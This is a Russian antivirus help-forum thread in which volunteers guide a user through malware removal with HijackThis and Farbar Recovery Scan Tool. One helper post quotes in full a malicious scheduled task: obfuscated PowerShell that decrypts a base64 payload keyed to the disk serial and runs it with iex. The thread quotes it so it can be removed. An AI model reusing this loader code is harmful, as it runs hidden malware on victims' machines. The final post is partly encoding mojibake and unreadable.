Показано с 1 по 8 из 8.

На Ноутбуке установлен Windows 10, система стала грузиться без каких либо запущенных программ (заявка № 223395)

  1. #1
    Junior Member Репутация
    Регистрация
    30.04.2011
    Сообщений
    111
    Вес репутации
    48

    На Ноутбуке установлен Windows 10, система стала грузиться без каких либо запущенных программ

    На Ноутбуке установлен Windows 10, система стала грузится без каких либо запущенных программ.
    Ноутбук - 510-15IKB Laptop (ideapad) 80SV00NAPB
    Так же пропала возможность автообновления Windows, после нажатия на " проверить обновление" ,выдаёт ошибку:

    "Нам не удалось подключиться к службе обновления. Мы повторим попытку позже. Кроме того, вы можете проверить наличие обновлений сейчас. Если это завершится неудачей, убедитесь, что вы подключены к Интернету."

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) Zmeu, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,481
    Вес репутации
    1058
    Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)пофиксите только эти строки:
    Код:
    O22 - Task: \AVAST Software\Overseer - C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe /from_scheduler:1
    O22 - Task: \Microsoft\Windows\Windows Filtering Platform\Windows Filtering Platform - C:\Program Files\Windows NT\Accessories\task.exe -Command "$idd = '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';$u='ZnVuY3Rpb24gZGVjKFtieXRlW11dJGNiLCBbc3RyaW5nXSRwYXNzKXskcGIgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCRwYXNzKTskcyA9ICRwYlswXTskaj0wO2ZvcigkaSA9IDA7ICRpIC1sdCAkY2IuQ291bnQ7ICRpKyspe2lmKCRqIC1nZSAkcGIuQ291bnQpeyRqPTB9ICRzID0gKDIzIC1iYW5kICRzIC1ib3IgMTUyKSAtYnhvciAkczskY2JbJGldID0gJGNiWyRpXSAtYnhvciAkcGJbJGpdIC1ieG9yICRzOyRqKyt9cmV0dXJuICRjYjt9JG9iaiA9IGd3bWkgd2luMzJfZGlza2RyaXZlIHwgd2hlcmUgeyRfLkRldmljZUlEIC1lcSAnXFwuXFBIWVNJQ0FMRFJJVkUwJ30gfCBzZWxlY3QgTW9kZWwsIFNlcmlhbG51bWJlcjskZCA9IGRlYyAoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkaWRkKSkgKCRvYmouTW9kZWwgKyAnICcgKyAkb2JqLlNlcmlhbG51bWJlcik7aWV4IChpZXgoJ1tTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0JysnU3RyaW5nKCRkKScpKQ==';iex (iex('[System.Text.Encoding]::UTF8.Get'+'String([System.Convert]::From'+'Base64String($'+'u))'))" (file missing)
    Грузится ровно то, что в автозагрузке.

    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  5. Это понравилось:


  6. #4
    Junior Member Репутация
    Регистрация
    30.04.2011
    Сообщений
    111
    Вес репутации
    48
    Прикрепил отчёты FRST в архиве

  7. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,481
    Вес репутации
    1058
    Ничего необычного, только остатки удалённых антивирусов.

    Выделите и скопируйте в буфер обмена следующий код:
    Код:
    CreateRestorePoint:
    CloseProcesses:
    2019-07-28 14:29 - 2019-08-13 13:33 - 000000000 ____D C:\WINDOWS\System32\Tasks\AVAST Software
    2019-07-28 14:29 - 2019-07-28 14:29 - 000000000 ____D C:\WINDOWS\System32\Tasks\Avira
    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    ContextMenuHandlers2: [a-squared Anti-Malware Shell Extension] -> {AB77609F-2178-4E6F-9C4B-44AC179D937A} =>  -> No File
    ContextMenuHandlers2: [a-squared Anti-Malware Shell Extension x64] -> {E3F21FC7-6D65-48E7-B62B-E9ED8200C764} =>  -> No File
    ContextMenuHandlers3: [a-squared Anti-Malware Shell Extension] -> {AB77609F-2178-4E6F-9C4B-44AC179D937A} =>  -> No File
    ContextMenuHandlers3: [a-squared Anti-Malware Shell Extension x64] -> {E3F21FC7-6D65-48E7-B62B-E9ED8200C764} =>  -> No File
    ContextMenuHandlers6: [a-squared Anti-Malware Shell Extension] -> {AB77609F-2178-4E6F-9C4B-44AC179D937A} =>  -> No File
    ContextMenuHandlers6: [a-squared Anti-Malware Shell Extension x64] -> {E3F21FC7-6D65-48E7-B62B-E9ED8200C764} =>  -> No File
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
    Reboot:
    Запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    Компьютер будет перезагружен автоматически.

    Вставьте диск, с которого устанавливали Windows (либо другой но с той же локализацией и тем же сервис паком (SP) что установлен у вас. Если его нет- продолжайте без него.

    Откройте меню "Пуск" ("Start") и в строке поиска введите "cmd". На результатах поиска нажмите правой клавишей мыши и выберите пункт "Запуск от имени администратора".

    Введите sfc /scannow и нажмите Enter.
    Система восстановит недостающие или изменённые системные файлы, для этого может потребоваться перезагрузка.
    WBR,
    Vadim

  8. #6
    Junior Member Репутация
    Регистрация
    30.04.2011
    Сообщений
    111
    Вес репутации
    48
    Ну скопировал и что делать с тем ,что скопировал?
    Открыл FRST нажал Fix , вот что пишет

  9. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,481
    Вес репутации
    1058
    Точно выделили всё содержимое окна "Код" и скопировали через буфер обмена по Ctrl-C?

    Попробуйте тогда так.
    Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него код: из предыдущего сообщения
    и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
    Отключите до перезагрузки антивирус, закройте все браузеры, запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    Компьютер будет перезагружен автоматически.
    WBR,
    Vadim

  10. #8
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,233
    Вес репутации
    977

    =C8=F2=EE=E3 =EB=E5=F7=E5=ED=E8=FF

    =D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
    =E5=F7=E5=ED=E8=FF:
    • =CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: 1
    • =CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: 5
    • =C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=
      =E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB =E2 =EA=E0=F0=E0=ED=F2=E8=ED=E0=F5 =ED=
      =E5 =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB

  • Уважаемый(ая) Zmeu, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Вирус, без каких-либо явных проявлений.
      От Полина С. в разделе Помогите!
      Ответов: 10
      Последнее сообщение: 17.05.2018, 07:09
    2. Ответов: 3
      Последнее сообщение: 10.05.2017, 10:36
    3. Ответов: 23
      Последнее сообщение: 06.03.2016, 23:54
    4. Ответов: 10
      Последнее сообщение: 08.05.2014, 18:46
    5. Ответов: 6
      Последнее сообщение: 05.09.2009, 11:04

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00151 seconds with 16 queries